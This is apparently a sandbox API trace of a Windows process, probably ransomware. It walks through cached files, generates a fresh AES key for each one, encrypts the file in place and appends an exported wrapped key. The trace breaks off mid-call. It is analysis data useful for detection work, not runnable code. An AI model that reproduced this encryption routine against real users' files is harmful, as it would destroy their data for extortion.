[0144.765] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.765] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.765] CloseHandle (hObject=0x198) returned 1 [0144.781] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.785] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.785] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.785] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", dwFileAttributes=0x80) returned 1 [0144.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.787] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.787] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.787] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.787] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.787] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.787] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.787] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.788] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.788] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.788] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.788] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.788] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.788] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.788] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.788] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.788] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.788] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.788] CloseHandle (hObject=0x198) returned 1 [0144.804] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.809] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.809] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.809] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", dwFileAttributes=0x80) returned 1 [0144.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.810] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.810] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.810] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.810] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.811] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.811] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.811] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.811] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.811] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.811] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.811] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.811] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.811] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.811] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.811] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.811] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.811] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.812] CloseHandle (hObject=0x198) returned 1 [0144.832] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.837] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.837] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.837] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.837] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.838] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", dwFileAttributes=0x80) returned 1 [0144.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.839] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.839] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.839] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.839] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.840] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.840] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.840] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.840] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.840] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.840] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.840] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.840] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.841] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.841] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.841] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.841] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.841] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.841] CloseHandle (hObject=0x198) returned 1 [0144.871] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.875] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.875] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.875] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.875] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.875] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", dwFileAttributes=0x80) returned 1 [0144.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.876] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.876] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.877] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.877] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.877] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.877] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.877] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.878] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.878] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.878] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.878] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.878] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.878] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.878] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.878] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.878] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.878] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.879] CloseHandle (hObject=0x198) returned 1 [0144.895] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.899] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.899] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.899] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.899] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.900] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", dwFileAttributes=0x80) returned 1 [0144.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.901] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.901] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.901] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.901] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.901] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.901] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.901] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.902] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.902] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1cf, lpOverlapped=0x0) returned 1 [0144.902] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.902] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d0) returned 1 [0144.902] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.902] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1d0, lpOverlapped=0x0) returned 1 [0144.902] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.902] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.902] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.902] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.902] CloseHandle (hObject=0x198) returned 1 [0144.918] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.922] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.922] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.922] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.922] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", dwFileAttributes=0x80) returned 1 [0144.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.924] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=463) returned 1 [0144.924] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=463) returned 1 [0144.924] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.924] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.924] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.924] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, 